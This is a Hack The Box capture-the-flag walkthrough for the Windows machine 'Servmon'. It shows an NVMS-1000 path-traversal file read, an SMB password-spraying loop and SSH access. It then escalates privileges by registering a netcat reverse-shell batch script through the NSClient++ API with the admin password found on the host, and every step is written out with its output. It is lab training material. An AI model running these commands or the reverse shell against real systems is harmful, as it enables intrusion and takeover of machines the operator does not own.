Hi! Let’s go for another writeup from Hack The Box, Servmon machine, level easy. It’s a Windows machine and below there is a recon by nmap:
root@hackthebox:~# nmap -sS -p- -O 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 23:48 -03 Nmap scan report for servmon (10.10.10.184) Host is up (0.13s latency). Not shown: 65516 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5040/tcp open unknown 5666/tcp open nrpe 6063/tcp open x11 6699/tcp open napster 7680/tcp open pando-pub 8443/tcp open https-alt 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=5/7%OT=21%CT=1%CU=34019%PV=Y%DS=2%DC=I%G=Y%TM=5EB37A77 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=U) OS:OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O OS:6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF OS:=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0% OS:Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z OS:%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y% OS:DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R% OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=8 OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 864.42 seconds
There is a lot of services available and that is a good thing. By enumerating main services:
- 21 FTP
- 22 SSH
- 445 SMB Share
- 80 HTTP (NVMS ???)
- 8443 HTTPS (Nagios Web Config)
- 5666 NRPE (Nagios Agent)
Let’s start with FTP. The first thing in FTP service is checking if Anonymous user are available (with no password).
root@hackthebox:~# ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete.
Nice! We’re in. There is a directory labeled
Users. Inside it has two directory: Nadine and Nathan:
ftp> cd Users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan 226 Transfer complete.
Inside of Nadine directory has text file called
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
And Nathan directory has another text file called
Notes to do.txt saying:
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
We have some tips here, let’s unite them:
- In Nathan’s Desktop directory has a file called
- Only two tasks were made by Nathan, so access to NVMS are available.
- What is NVMS?
- We confirmed that NSClient is available on the host and it will be useful later
What is NVMS?. By accessing port 80, I saw this login screen:
At first search on Google, it told me that NVMS-1000 is a DVR (Digital Video Recorder), so I’ve searched for some vulnerability about it and I found this. It’s a script that exploits a path traversal on NVMS-1000 web configuration. By using this script, let’s try to read that Nathan’s file
root@hackthebox:# ./nvms.py 10.10.10.184 /users/nathan/desktop/passwords.txt [+] DT Attack Succeeded [+] File Content ++++++++++ BEGIN ++++++++++ 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ ++++++++++ END ++++++++++
Now I have two users and 7 passwords that I can try out. I made a script using SMB protocol to test each user and password:
root@hackthebox:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nathan%$i -L //10.10.10.184/; done 1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE L1k3B1gBut7s@W0rk => session setup failed: NT_STATUS_LOGON_FAILURE 0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE
None of this passwords belongs to Nathan.
root@hackthebox:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nadine%$i -L //10.10.10.184/; done 1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE L1k3B1gBut7s@W0rk => Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available 0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE
L1k3B1gBut7s@W0rk. I spent my time trying
smbexecand none of them worked. However, I forgot about my first recon: there is SSH service running on host. OK then:
I’ve just owned user. Now I have to escalate privileges. By making the recon over the host and searching for some admin’s privileges,
Nadine user has no specific privilege at all. I have to find another way to escalate privileges. Then I remembered about NSClient running on host. By searching for exploit for NSClient, here teaches how to escalate privileges by web configuration interface. OK, I tried to follow this tutorial getting the password at
\Program Files\NSClient++\nsclient.ini and I tried to logon in NSClient web configuration in port 8443, but it didn’t work. When I came back on Nadine’s checklist in FTP, I saw that NSClient access was locked and
nsclient.ini confirmed this:
nadine@SERVMON C:\Users\Nadine>type "\Program Files\NSClient++\nsclient.ini" ... ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ...
Now what? I spent my time again wondering that should I had to do. Then I decided to start from begining: reading the NSClient++ docs! By reading at first glance, I noticed this:
There is an API! In my hand I have password admin located at
nsclient.ini. By according with this manual, that’s the way how to authenticate and access NSClient++ API:
curl -s -k -u admin https://localhost:8443/api/v1/info
But I didn’t have
curl in Windows. I had to download it here, decompressed it and sent the curl directory via SSH into Nadine user. If everything worked well, the output will looks like this:
By following here, the next steps are:
- Create script to reverse shell
- Register script into
- Force to run this script registered into
The script needs to connect to my host when called by
NSClient++, but how it will connect? There so many ways to do this and I chose
NetCat, but you can choose Powershell, Python, Lua…
NSClient++ supports all of these languages. Pick one!
Getting back, I’ve downloaded NetCat for Windows and sent it:
root@hackthebox:~# scp nc.exe [email protected]:/temp
I made this batch script below to register in
@echo off c:\temp\nc.exe 10.10.13.13 4444 -e cmd.exe
And sent it via SSH:
root@hackthebox:~# scp evil.bat [email protected]:/users/nadine/Desktop
Alright! It’s time to register this script into
NSClient++. By reading more
NSClient++ document and learning more about its API, I found this section and I could register my script:
nadine@SERVMON C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat Added evil as scripts\evil.bat
The last step is force
NSClient++ to run my malicious script, according with this section, but before this, I had to prepare my host to listen this specific connection:
root@hackthebox:~# nc -lvp 4444 listening on [any] 4444...
Now I force running my script:
nadine@SERVMON C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/queries/evil/commands/execute
Checking my terminal listening to port 4444:
root@hackthebox:~# nc -lvp 4444 listening on [any] 4444... connect to [10.10.13.13] from servmon [10.10.10.184] 49733 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>